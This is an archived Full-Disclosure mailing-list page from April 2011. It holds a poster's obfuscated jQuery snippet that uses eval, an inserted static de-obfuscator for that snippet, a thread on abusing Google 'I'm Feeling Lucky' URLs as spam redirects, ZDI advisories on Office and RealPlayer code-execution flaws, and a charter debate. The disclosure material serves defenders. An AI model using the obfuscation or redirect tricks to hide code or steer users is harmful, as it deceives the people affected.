Re: [Full-disclosure] guess what this does..

2011-04-12 Thread Christian Sciberras
Other than a parse error? Nothing.





On Tue, Apr 12, 2011 at 11:28 PM, Cal Leeming  wrote:

> $(function() {
> var
> _0xafd3=["\x74\x20\x3D\x20\x22","","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x72\x65\x70\x6C\x61\x63\x65","\x22"];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\",\"/gi,_0xafd3[1])[_0xafd3[5]](/\"/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
> var
> _0x5bfa=["\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E","\x74\x79\x70\x65","\x68\x69\x64\x64\x65\x6E","\x61\x74\x74\x72","\x6E\x61\x6D\x65","\x73\x65\x65\x64\x6B\x65\x79","\x76\x61\x6C\x75\x65","\x61\x70\x70\x65\x6E\x64","\x23\x74\x68\x65\x66\x6F\x72\x6D"];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
> });
>
> enjoy ;p
>
> ps) yes I obfuscated this, and no it doesn't contain any nasties.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Raj Mathur (राज माथुर)
On Tuesday 12 Apr 2011, Steven Pinkham wrote:
> [snip]
> 2)Only announcements for OSI approved projects.  Webappsec has this
> policy I think, and it rewards people who share the most openly.

OSI doesn't approve projects, only licences.  I presume you mean "Only 
announcements for projects released under an OSI-approved licence." 


Regards,

-- Raj
-- 
Raj Mathur  r...@kandalaya.org  http://kandalaya.org/
   GPG: 78D4 FC67 367F 40E2 0DD5  0FEF C968 D0EF CC68 D17F
PsyTrance & Chill: http://schizoid.in/   ||   It is the mind that moves



[Full-disclosure] guess what this does..

2011-04-12 Thread Cal Leeming
$(function() {
var
_0xafd3=["\x74\x20\x3D\x20\x22","","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x72\x65\x70\x6C\x61\x63\x65","\x22"];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\",\"/gi,_0xafd3[1])[_0xafd3[5]](/\"/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
var
_0x5bfa=["\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E","\x74\x79\x70\x65","\x68\x69\x64\x64\x65\x6E","\x61\x74\x74\x72","\x6E\x61\x6D\x65","\x73\x65\x65\x64\x6B\x65\x79","\x76\x61\x6C\x75\x65","\x61\x70\x70\x65\x6E\x64","\x23\x74\x68\x65\x66\x6F\x72\x6D"];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
});

enjoy ;p

ps) yes I obfuscated this, and no it doesn't contain any nasties.
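As an added example (not code from Cal's post or from any tool the thread names), a static de-obfuscator for the pattern used above: it decodes the hex-escaped string arrays, inlines the `_0x…[n]` lookups and folds `obj["name"]` into `obj.name`, without ever executing the input. The sample input is the snippet from the post.

```javascript
// Added example (not code from the post): a static de-obfuscator for the
// "hex-escaped string array + indexed lookup" pattern in the snippet above.
// Nothing here executes the input; the eval() survives only as output text.

// Sample input: the snippet from the post, via String.raw so the \xNN
// escapes stay as source text instead of being decoded by the JS parser.
const OBFUSCATED = String.raw`$(function() {
var
_0xafd3=["\x74\x20\x3D\x20\x22","","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x72\x65\x70\x6C\x61\x63\x65","\x22"];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\",\"/gi,_0xafd3[1])[_0xafd3[5]](/\"/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
var
_0x5bfa=["\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E","\x74\x79\x70\x65","\x68\x69\x64\x64\x65\x6E","\x61\x74\x74\x72","\x6E\x61\x6D\x65","\x73\x65\x65\x64\x6B\x65\x79","\x76\x61\x6C\x75\x65","\x61\x70\x70\x65\x6E\x64","\x23\x74\x68\x65\x66\x6F\x72\x6D"];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
});`;

// Decode the escape sequences inside the body of one double-quoted literal.
function decodeJsString(body) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", v: "\v", "0": "\0" };
  return body.replace(/\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|.)/g, (_, esc) => {
    if (esc[0] === "x" || esc[0] === "u") {
      return String.fromCharCode(parseInt(esc.slice(1), 16));
    }
    // \" -> " and \\ -> \ fall through unchanged.
    return Object.prototype.hasOwnProperty.call(simple, esc) ? simple[esc] : esc;
  });
}

// A `var _0xNNNN=["...","..."];` declaration; `var` and the name may be
// separated by a line break, as in the mailed snippet.
const TABLE_DECL = /var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[((?:\s*"(?:[^"\\]|\\.)*"\s*,?)*)\]\s*;/g;

// Map each string-table variable name to its decoded strings.
function extractStringTables(src) {
  const tables = {};
  for (const m of src.matchAll(TABLE_DECL)) {
    const strings = [];
    for (const lit of m[2].matchAll(/"((?:[^"\\]|\\.)*)"/g)) {
      strings.push(decodeJsString(lit[1]));
    }
    tables[m[1]] = strings;
  }
  return tables;
}

// Drop the table declarations, inline every table[index] reference as a
// string literal, then fold obj["name"] into obj.name for readability.
function deobfuscate(src) {
  const tables = extractStringTables(src);
  let out = src.replace(TABLE_DECL, (whole, name) =>
    Object.prototype.hasOwnProperty.call(tables, name) ? "" : whole);
  for (const [name, strings] of Object.entries(tables)) {
    const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
    out = out.replace(ref, (whole, idx) =>
      Number(idx) < strings.length ? JSON.stringify(strings[Number(idx)]) : whole);
  }
  return out.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
}

// From the cleaned code, list the attributes set with .attr("k", v) (v is a
// literal or a variable name) and the selectors that receive .append().
function summarizeDomChanges(cleaned) {
  const attrs = {};
  for (const m of cleaned.matchAll(/\.attr\("([^"]+)",\s*(?:"([^"]*)"|([\w$]+))\)/g)) {
    attrs[m[1]] = m[2] !== undefined ? m[2] : { variable: m[3] };
  }
  const appendTargets = [...cleaned.matchAll(/\$\("([^"]+)"\)\.append\(/g)].map(m => m[1]);
  return { attrs, appendTargets };
}

const CLEANED = deobfuscate(OBFUSCATED);
console.log(CLEANED);
console.log(JSON.stringify(summarizeDomChanges(CLEANED)));
```

The summary shows a hidden input named seedkey whose value comes from the variable t, appended to #theform; the cleaned source shows t is built by stripping ZPAK and quotes from s and reversing it.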

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Cal Leeming
Actually, the filtering seems to be based on the accuracy of the first hit
set.

http://www.google.com/search?q=hacker&btnI - win
http://www.google.com/search?q=hello+hacker&btnI - fail
http://www.google.com/search?q=hello+hack&btnI - win
http://www.google.com/search?q=hello+hac&btnI - fail
http://www.google.com/search?q=hello&btnI - win

See what I mean?

On Tue, Apr 12, 2011 at 2:38 PM, satyam pujari  wrote:

> @Cal Try this...
>
> http://www.google.com/search?q=esploit&btnI
>
> http://www.google.com/search?q=esploit+zeus&btnI
>
> http://www.google.com/search?q=0x+t35&btnI&safe=active
>
> some of them didn't work as well..
>
> http://www.google.com/search?q=0x+t35&btnI
>
> http://www.google.com/search?q=hello+hacker&btnI
>
> but funny "hello human" works..
>
> http://www.google.com/search?q=hello+human&btnI
>
> I bet there's some keyword filter/check at Google's side (but I
> believe which can be bypassed)
> So, it's all about playing with the keywords.
>
>
> On Tue, Apr 12, 2011 at 2:39 PM, Cal Leeming  wrote:
> >
> > Didn't seem to work for me:
> >
> > http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage+refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b
> >
> > On Tue, Apr 12, 2011 at 4:05 AM, Leon Kaiser wrote:
> >>
> >> I don't see why people are able to directly link to "I'm Feeling Lucky"
> >> Google search results in the first place. Can anyone think of a practical
> >> use for it?
> >>
> >> 
> >> Leon Kaiser  - Head of GNAA Public Relations -
> >> litera...@gnaa.eu || litera...@goatse.fr
> >>http://gnaa.eu || http://security.goatse.fr
> >>   7BEECD8D FCBED526 F7960173 459111CE F01F9923
> >> "The mask of anonymity is not intensely constructive."
> >>-- Andrew "weev" Auernheimer
> >> 
> >>
> >> On Sun, 2011-04-10 at 14:05 +0530, satyam pujari wrote:
> >>
> >> Thanks for that Nick, good to know, but unfortunately it's still
> >> exploitable in 2011 :)
> >>
> >> On Sun, Apr 10, 2011 at 2:31 AM, Nick FitzGerald <n...@virus-l.demon.co.uk> wrote:
> >>
> >> satyam pujari wrote:
> >>
> >> > Here is a simple Google's "I'm Feeling Lucky" search feature
> >> > exploitation scenario.
> >>
> >> > [...]
> >>
> >> Yawn...
> >>
> >> That's _so_ 2007!
> >>
> >>   http://www.virusbtn.com/resources/spammerscompendium/lucky.xml
> >>
> >> ...and I seriously doubt that was the first time it was done, just when
> >> _I_ happened to make a note of it being actively abused in spam.
> >>
> >> All that other stuff about free hosting sites and IFrames on
> >> blogger.com is unnecessary implementation detail that can be achieved
> >> multitudinous ways.
> >>
> >>
> >>
> >> Regards,
> >>
> >> Nick FitzGerald
> >>
> >>

Re: [Full-disclosure] Google Search Feature Exploitation Scenario

2011-04-12 Thread Nick FitzGerald
Cal Leeming wrote:

> Didn't seem to work for me:
> 
> http://www.google.com/search?hl=en&q=easyratemortage+tax+deductible+mortgage+refinancing+strategy&btnI=AaEbK6r0Kz0r9JU4b

It certainly did when I first reported that URL back in Sep 2007.

A far from exhaustive bit of testing just now shows that it appears 
that Google is doing a Referer check on just those search terms (not 
just on the order), as you can do an "I'm feeling Lucky" search _from 
Google_ for those terms and get auto-redirected to the top search 
result, but if you just hit one of those search URLs with the IFL flag, 
you get the search results rather than an auto-redirect.

Did you think to try some less well-publicized URL abusing this 
functionality?

I wonder which other (if any) IFL abuse URLs that have been used in 
spam, scams and such Google blocks?



Regards,

Nick FitzGerald




Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Pete Smith
I agree, un-moderated doesn't mean that people can't be banned for breaking
the rules or being a troll...

Pete

On 13 April 2011 06:35, Michal Zalewski  wrote:

> > It's whatever, un-moderated means exactly that. No-one can tell anyone
> else what to release/write. Period.
>
> Of course you can. That's what the charter is for. Unmoderated means
> simply that the charter is usually not proactively enforced (but even
> that is hardly an absolute guarantee).
>
> /mz
>

[Full-disclosure] ZDI-11-125: Microsoft Office PowerPoint PersistDirectoryEntry Remote Code Execution Vulnerability

2011-04-12 Thread ZDI Disclosures
ZDI-11-125: Microsoft Office PowerPoint PersistDirectoryEntry Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-125

April 12, 2011

-- CVE ID:
CVE-2011-0656

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office PowerPoint

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10885. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office PowerPoint. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within how the application handles an exception
within the PersistDirectoryEntry records when loading a presentation.
When an entry points to a container containing a Slide with a malformed
record, the application will raise an exception during the loading of
the record. Afterward the application will use a method off of this
malformed object which can lead to code execution under the context of
the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx

-- Disclosure Timeline:
2010-09-14 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] ZDI-11-124: Microsoft PowerPoint TimeColorBehaviorContainer Floating Point Record Remote Code Execution Vulnerability

2011-04-12 Thread ZDI Disclosures
ZDI-11-124: Microsoft PowerPoint TimeColorBehaviorContainer Floating Point 
Record Remote Code Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-124

April 12, 2011

-- CVE ID:
CVE-2011-0655

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office PowerPoint

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10873. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office PowerPoint. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within how the application parses a record
associated with animation. If a container holds a specific record type,
the application will explicitly trust a length used in this record to
calculate a pointer for copying floating point numbers to. This can be
used to write outside of an allocated buffer and will lead to code
execution under the context of the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx

-- Disclosure Timeline:
2010-09-14 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous




[Full-disclosure] ZDI-11-123: Microsoft PowerPoint TimeCommandBehaviorContainer Remote Code Execution Vulnerability

2011-04-12 Thread ZDI Disclosures
ZDI-11-123: Microsoft PowerPoint TimeCommandBehaviorContainer Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-123

April 12, 2011

-- CVE ID:
CVE-2011-0655

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office PowerPoint

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10822. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office PowerPoint. User
interaction is required to exploit this vulnerability in that the target
must visit a malicious page or open a malicious file.

The specific flaw exists within the ppcore.dll module responsible for
parsing PowerPoint (ppt) files. When parsing a malformed
TimeCommandBehaviorContainer structure the process raises an exception
that causes an object in memory to be freed prior to being fully parsed.
Due to the lack of a check that this object has been freed, a later
function references an invalid pointer element. This can be leveraged by
a remote attacker to execute arbitrary code under the context of the
user running PowerPoint.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx

-- Disclosure Timeline:
2010-09-24 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous




[Full-disclosure] ZDI-11-122: RealNetworks RealPlayer OpenURLInDefaultBrowser Remote Code Execution Vulnerability

2011-04-12 Thread ZDI Disclosures
ZDI-11-122: RealNetworks RealPlayer OpenURLInDefaultBrowser Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-122

April 12, 2011

-- CVE ID:
CVE-2011-1426

-- CVSS:
9.7, (AV:N/AC:L/Au:N/C:C/I:P/A:C)

-- Affected Vendors:
RealNetworks

-- Affected Products:
RealNetworks RealPlayer

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11062. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of RealNetworks RealPlayer. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within RealPlayer, which exposes a method called
OpenURLInDefaultBrowser() that can be accessed through RealPlayer's
internal browser. When this method is called, it will open and execute
the first parameter based on the operating system's default handler for
the filetype. An attacker can reach RealPlayer's internal browser by
utilizing a specially crafted .rnx file. This can be leveraged to
execute arbitrary code under the context of the user invoking
RealPlayer.

-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:

http://service.real.com/realplayer/security/04122011_player/en/

-- Disclosure Timeline:
2011-02-17 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Peter Vreugdenhil ( http://vreugdenhilresearch.nl )
* Andrea Micalizzi aka rgod




Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Michal Zalewski
> It's whatever, un-moderated means exactly that. No-one can tell anyone else 
> what to release/write. Period.

Of course you can. That's what the charter is for. Unmoderated means
simply that the charter is usually not proactively enforced (but even
that is hardly an absolute guarantee).

/mz



Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Ryan Sears
Yeah, I second that. 

Where do you draw the line if you do start making up rules like that? What 
about a vulnerability like path-disclosure or insufficient anti-automation? 
Granted they're not huge bugs, but they ARE bugs. 

There's crap I don't want to read on this list, but that's a decision I have to 
make. Granted the INSECT Pro minor releases are a bit annoying, but no more 
than Cal sending porn to the list. 

It's whatever, un-moderated means exactly that. No-one can tell anyone else 
what to release/write. Period. 

Ryan

- Original Message -
From: "rancor" 
To: "Steve Pinkham" 
Cc: full-disclosure@lists.grok.org.uk
Sent: Tuesday, April 12, 2011 3:50:59 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Announcement posts and the charter (was Re: 
INSECT Pro 2.5.1 released)

What to do about it? It's not moderated?

Just ignore stuff and use the often used key called delete. Simple as that
=)

// rancor
On 12 Apr 2011 21:16, "Steve Pinkham" wrote:
> On 04/12/2011 09:04 AM, phil wrote:
>> Just keep that simple, the post hit the non-acceptable content.
>>
>> "Gratuitous advertisement, product placement, or self-promotion is
>> forbidden."
>>
>>
>>
>> My opinion, but if the product could be free, like it was, then I don't
>> mind seeing those kinds of posts, but for anything commercial FD is not
>> there for that.
>>
>
> I agree, but think that intuition should be inscribed in more precise
> language.
>
> That whole sentence starts out with "Gratuitous", which to me seems to
> be unclear to both native and non-native speakers alike. IMHO it's just
> too easy to justify to yourself that what you are doing does not
> violate the wording of the charter, and therefore I think the charter
> should be more explicit.
>
> When would it be OK (non-gratuitous) to mention a tool? When it comes
> with a new vulnerability class? When it was used to find a particular
> flaw? When it shows a novel way of finding flaws of a particular class?
> When the tool is Open Source, such that the tool is an embodiment of
> knowledge being shared?
>
> This whole issue with INSECT Pro shows a lack of consensus on what
> advertisement means, and what kicked it off was a disagreement about
> what the definition of a "free" product is.
>
> I'm coming around to the idea that the rules should be based on
> knowledge transfer. My intuition is that only projects with
> OSI-approved licenses should be allowed (as Tim argued), unless you are
> releasing a tool of any sort along with a new class of vulnerability.
> Also, announcements of more than 1 per six months should be forbidden
> for any project. This would serve as a sort of default deny rule to
> keep the most annoying types of announcements at bay.
>
> Any other thoughts?
>
> The other possibility is that the current wording is sufficient as a
> simple "Don't be a dick" kind of rule, and more specific rules would be
> lost on those who have no problem with being a dick. I would argue that
> more guidance in the charter on this issue might be worthwhile for the
> majority of people who do not in fact want to break Wheaton's law.
>
>
>>
>> -phil
>>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>



Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread rancor
What to do about it? It's not moderated?

Just ignore stuff and use the often used key called delete. Simple as that
=)

// rancor
On 12 Apr 2011 21:16, "Steve Pinkham" wrote:
> On 04/12/2011 09:04 AM, phil wrote:
>> Just keep that simple, the post hit the non-acceptable content.
>>
>> "Gratuitous advertisement, product placement, or self-promotion is
>> forbidden."
>>
>>
>>
>> My opinion, but if the product could be free, like it was, then I don't
>> mind seeing those kinds of posts, but for anything commercial FD is not
>> there for that.
>>
>
> I agree, but think that intuition should be inscribed in more precise
> language.
>
> That whole sentence starts out with "Gratuitous", which to me seems to
> be unclear to both native and non-native speakers alike. IMHO it's just
> too easy to justify to yourself that what you are doing does not
> violate the wording of the charter, and therefore I think the charter
> should be more explicit.
>
> When would it be OK (non-gratuitous) to mention a tool? When it comes
> with a new vulnerability class? When it was used to find a particular
> flaw? When it shows a novel way of finding flaws of a particular class?
> When the tool is Open Source, such that the tool is an embodiment of
> knowledge being shared?
>
> This whole issue with INSECT Pro shows a lack of consensus on what
> advertisement means, and what kicked it off was a disagreement about
> what the definition of a "free" product is.
>
> I'm coming around to the idea that the rules should be based on
> knowledge transfer. My intuition is that only projects with
> OSI-approved licenses should be allowed (as Tim argued), unless you are
> releasing a tool of any sort along with a new class of vulnerability.
> Also, announcements of more than 1 per six months should be forbidden
> for any project. This would serve as a sort of default deny rule to
> keep the most annoying types of announcements at bay.
>
> Any other thoughts?
>
> The other possibility is that the current wording is sufficient as a
> simple "Don't be a dick" kind of rule, and more specific rules would be
> lost on those who have no problem with being a dick. I would argue that
> more guidance in the charter on this issue might be worthwhile for the
> majority of people who do not in fact want to break Wheaton's law.
>
>
>>
>> -phil
>>
> --
> | Steven Pinkham, Security Consultant |
> | http://www.mavensecurity.com |
> | GPG public key ID CD31CAFB |
>

Re: [Full-disclosure] Announcement posts and the charter (was Re: INSECT Pro 2.5.1 released)

2011-04-12 Thread Steve Pinkham
On 04/12/2011 09:04 AM, phil wrote:
> Just keep that simple, the post hit the non-acceptable content.
> 
> "Gratuitous advertisement, product placement, or self-promotion is
> forbidden."
> 
> 
> 
> My opinion, but if the product could be free, like it was, then I don't
> mind seeing those kinds of posts, but for anything commercial FD is not
> there for that.
> 

I agree, but think that intuition should be inscribed in more precise
language.

That whole sentence starts out with "Gratuitous", which to me seems to
be unclear to both native and non-native speakers alike. IMHO it's just
too easy to justify to yourself that what you are doing does not
violate the wording of the charter, and therefore I think the charter
should be more explicit.

When would it be OK (non-gratuitous) to mention a tool? When it comes
with a new vulnerability class? When it was used to find a particular
flaw? When it shows a novel way of finding flaws of a particular class?
When the tool is Open Source, such that the tool is an embodiment of
knowledge being shared?

This whole issue with INSECT Pro shows a lack of consensus on what
advertisement means, and what kicked it off was a disagreement about
what the definition of a "free" product is.

I'm coming around to the idea that the rules should be based on
knowledge transfer. My intuition is that only projects with
OSI-approved licenses should be allowed (as Tim argued), unless you are
releasing a tool of any sort along with a new class of vulnerability.
Also, announcements of more than 1 per six months should be forbidden
for any project. This would serve as a sort of default deny rule to
keep the most annoying types of announcements at bay.

Any other thoughts?

The other possibility is that the current wording is sufficient as a
simple "Don't be a dick" kind of rule, and more specific rules would be
lost on those who have no problem with being a dick. I would argue that
more guidance in the charter on this issue might be worthwhile for the
majority of people who do not in fact want to break Wheaton's law.


> 
> -phil
> 
-- 
 | Steven Pinkham, Security Consultant|
 | http://www.mavensecurity.com   |
 | GPG public key ID CD31CAFB |




[Full-disclosure] ZDI-11-121: Microsoft Office XP Data Validation Record Parsing Remote Code Execution Vulnerability

2011-04-12 Thread ZDI Disclosures
ZDI-11-121: Microsoft Office XP Data Validation Record Parsing Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-121

April 12, 2011

-- CVE ID:
CVE-2011-0105

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office Excel

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 11033. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office Excel. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The specific flaw exists within the application's parsing of a
particular record within a Microsoft Excel Compound Document. When
specifying a particular value, the application will fail to initialize a
variable that is used as the length of a memcpy operation. Due to the
usage of the uninitialized value, with proper control of the program
flow an attacker can force a length of their own choosing for the memcpy
operation. This will cause a buffer overflow and can lead to code
execution under the context of the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms11-021.mspx

-- Disclosure Timeline:
2010-10-18 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aniway (Aniway.Anyway AT gmail DOT com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi



[Full-disclosure] ZDI-11-120: Microsoft Office Excel RealTimeData Record Parsing Remote Code Execution Vulnerability

2011-04-12 Thread ZDI Disclosures
ZDI-11-120: Microsoft Office Excel RealTimeData Record Parsing Remote Code 
Execution Vulnerability

http://www.zerodayinitiative.com/advisories/ZDI-11-120

April 12, 2011

-- CVE ID:
CVE-2011-0101

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office Excel 2002

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 10872. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Office Excel. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or open a malicious file.

The flaw exists within the methods used for RealTimeData Record Parsing.
When handling a stTopic field that has a bit set specifying double byte
characters in the following field, the value of a global pointer is
improperly calculated. This pointer is later used in a memcpy operation
whose source is user supplied data. A remote attacker can exploit this
vulnerability to execute arbitrary code under the context of the user.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More
details can be found at:

http://www.microsoft.com/technet/security/bulletin/ms11-021.mspx

-- Disclosure Timeline:
2010-11-15 - Vulnerability reported to vendor
2011-04-12 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Aniway (Aniway.Anyway AT gmail DOT com)

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

